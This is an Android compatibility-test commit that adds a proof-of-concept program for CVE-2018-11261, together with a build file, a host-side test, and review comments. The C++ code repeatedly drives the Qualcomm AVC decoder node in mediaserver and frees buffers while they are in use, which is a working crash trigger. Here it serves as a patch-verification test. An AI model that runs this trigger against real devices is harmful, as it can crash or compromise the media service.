CTS test for Android Security b/113527377

Test: successful run of newly introduced CTS test case.

Bug: 113527377
Change-Id: Ic13afee0427be06475395e11f39e231661debb36
Merged-In: Ic13afee0427be06475395e11f39e231661debb36
(cherry picked from commit 334bfadcb70a953430184c02fe04c15150df33de)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 6878d30..8ca3e00 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -181,6 +181,11 @@
         <option name="push" value="CVE-2018-9424->/data/local/tmp/CVE-2018-9424" />
 
         <!--__________________-->
+        <!-- Bulletin 2018-09 -->
+        <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+        <option name="push" value="CVE-2018-11261->/data/local/tmp/CVE-2018-11261" />
+
+        <!--__________________-->
         <!-- Bulletin 2018-10 -->
         <!-- Please add tests solely from this bulletin below to avoid merge conflict -->
         <option name="push" value="CVE-2018-9490->/data/local/tmp/CVE-2018-9490" />
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk
new file mode 100644
index 0000000..fa13952
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/Android.mk
@@ -0,0 +1,23 @@
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_MODULE := CVE-2018-11261
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_C_INCLUDES:= \
+    $(TOP)/frameworks/av/include/media/ \
+    $(TOP)/frameworks/native/include/media/openmax \
+    $(TOP)/hardware/libhardware/modules/gralloc/ \
+    $(TOP)/frameworks/av/media/libstagefright/ \
+    $(TARGET_OUT_INTERMEDIATES)/include/mm-core/
+
+LOCAL_SHARED_LIBRARIES += libmedia libbinder libui libgui libutils
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS+= -Wall -Werror
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp
new file mode 100644
index 0000000..91d5b0e
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2018-11261/poc.cpp
@@ -0,0 +1,133 @@
+/**
+ * CVE-2018-11261
+ */
+#undef _GNU_SOURCE
+#define _GNU_SOURCE
+#include "../includes/common.h"
+#include "OMX_Component.h"
+#include <binder/IServiceManager.h>
+#include <binder/ProcessState.h>
+#include <media/IMediaPlayerService.h>
+#include <media/IOMX.h>
+#include <media/OMXBuffer.h>
+#include <media/hardware/HardwareAPI.h>
+#include <omx/OMXUtils.h>
+#include <stdlib.h>
+#include <time.h>
+
+using namespace android;
+
+struct DummyOMXObserver : public BnOMXObserver {
+public:
+  DummyOMXObserver() {}
+
+  virtual void onMessages(const std::list<omx_message> &messages __unused) {}
+
+protected:
+  virtual ~DummyOMXObserver() {}
+};
+
+struct DeathRecipient : public IBinder::DeathRecipient {
+  DeathRecipient() : mDied(false) {}
+  bool mDied;
+  virtual void binderDied(const wp<IBinder> &who __unused) { mDied = true; }
+  bool died() const { return mDied; }
+};
+
+extern bool connectOMX(sp<IOMX> &omx) {
+  sp<IBinder> binder;
+  sp<IServiceManager> sm = defaultServiceManager();
+
+  binder = sm->getService(String16("media.player"));
+  sp<IMediaPlayerService> service = interface_cast<IMediaPlayerService>(binder);
+
+  if (binder == NULL) {
+    return false;
+  }
+  omx = service->getOMX();
+  if (omx == NULL) {
+    return false;
+  }
+  return true;
+}
+
+int poc() {
+  sp<IOMX> service;
+  if (connectOMX(service) == false) {
+    return EXIT_FAILURE;
+  }
+  sp<IOMXNode> node = 0;
+  OMXBuffer omxBuf;
+  int fenceFd = -1;
+  sp<DummyOMXObserver> observer = new DummyOMXObserver();
+
+  const char *codecName = "OMX.qcom.video.decoder.avc";
+  status_t err = service->allocateNode(codecName, observer, &node);
+  if (err != OK) {
+    return EXIT_FAILURE;
+  }
+  sp<DeathRecipient> deathRecipient(new DeathRecipient());
+  IInterface::asBinder(service)->linkToDeath(deathRecipient);
+
+  err = node->sendCommand(OMX_CommandStateSet, 2);
+  // get input port parameters
+  OMX_PARAM_PORTDEFINITIONTYPE def;
+  InitOMXParams(&def);
+  def.nPortIndex = 0;
+  OMX_INDEXTYPE omx_indextype = OMX_IndexParamPortDefinition;
+  err = node->getParameter(omx_indextype, &def, sizeof(def));
+
+  int inMemSize = def.nBufferCountActual * def.nBufferSize;
+  int inBufferCnt = def.nBufferCountActual;
+  int inBufferSize = inMemSize / inBufferCnt;
+  sp<MemoryDealer> dealerIn = new MemoryDealer(inMemSize);
+  IOMX::buffer_id *inBufferId = new IOMX::buffer_id[inBufferCnt];
+
+  // get output port parameters
+  InitOMXParams(&def);
+  def.nPortIndex = 1;
+  err = node->getParameter(omx_indextype, &def, sizeof(def));
+
+  // prepare output port buffers
+  int outMemSize = def.nBufferCountActual * def.nBufferSize;
+  int outBufferCnt = def.nBufferCountActual;
+  int outBufferSize = outMemSize / outBufferCnt;
+  sp<MemoryDealer> dealerOut = new MemoryDealer(outMemSize);
+
+  for (int i = 0; i < inBufferCnt; i++) {
+    sp<IMemory> memory = dealerIn->allocate(inBufferSize);
+    memset(memory->pointer(), 0xcd, inBufferSize);
+    OMXBuffer omxBuf(memory);
+    err = node->useBuffer(0, omxBuf, &inBufferId[i]);
+  }
+
+  for (int i = 0; i < outBufferCnt; i++) {
+    sp<IMemory> memory = dealerOut->allocate(outBufferSize);
+    memset(memory->pointer(), 0x9a, outBufferSize);
+  }
+
+  // change state from idle to executing
+  err = node->sendCommand(OMX_CommandStateSet, 3);
+
+  for (int i = 0; i < inBufferCnt; i++) {
+    err = node->emptyBuffer(inBufferId[i], omxBuf, 0, 0, fenceFd);
+    node->freeBuffer(1, inBufferId[i]);
+  }
+  sleep(1);
+  node->freeNode();
+  if (deathRecipient->died()) {
+    exit(0); //binder died
+  }
+  return 0;
+}
+
+int main() {
+  sp<ProcessState> proc(ProcessState::self());
+  ProcessState::self()->startThreadPool();
+  time_t test_started = start_timer();
+  while (timer_active(test_started)) {
+    poc();
+    sleep(1);
+  }
+  return 0;
+}
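Review bot: The results of both `getParameter` calls in poc() are assigned to `err` and never checked, so if either call fails or reports `nBufferCountActual == 0`, `inMemSize / inBufferCnt` (or the output-port equivalent) divides by zero and the test binary itself faults instead of exercising the service. The same pattern applies to `useBuffer`: on failure `inBufferId[i]` may be left uninitialised and is then passed to `emptyBuffer` and `freeBuffer`, and the result of `dealerIn->allocate()` is dereferenced through `memory->pointer()` without a null check. Adding `if (err != OK || def.nBufferCountActual == 0) return EXIT_FAILURE;` after each `getParameter` would keep a harness failure distinguishable from a crash in the target. `inBufferId` is also allocated with `new[]` on every pass of the loop in main() and never released; a `std::vector<IOMX::buffer_id>` would avoid that and stay correct with the early returns.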
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java
new file mode 100644
index 0000000..25bc89e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_09.java
@@ -0,0 +1,15 @@
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_09 extends SecurityTestCase {
+
+  /**
+   * CVE-2018-11261
+   */
+  @SecurityTest(minPatchLevel = "2018-09")
+  public void testPocCVE_2018_11261() throws Exception {
+    AdbUtils.runPocAssertNoCrashes("CVE-2018-11261", getDevice(), "mediaserver");
+  }
+}
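Review bot: The Javadoc on testPocCVE_2018_11261 only repeats the CVE id and does not say what a pass means. From the lines visible here the test passes whenever no `mediaserver` crash is observed, and poc.cpp in this commit returns early when `OMX.qcom.video.decoder.avc` cannot be allocated while main() discards that result, so a device without that codec would presumably pass without the code path being exercised. I would state that in the comment, e.g. `/** b/113527377: runs the CVE-2018-11261 PoC against the OMX.qcom.video.decoder.avc node; passes if mediaserver does not crash, including on devices where the node cannot be allocated. */`.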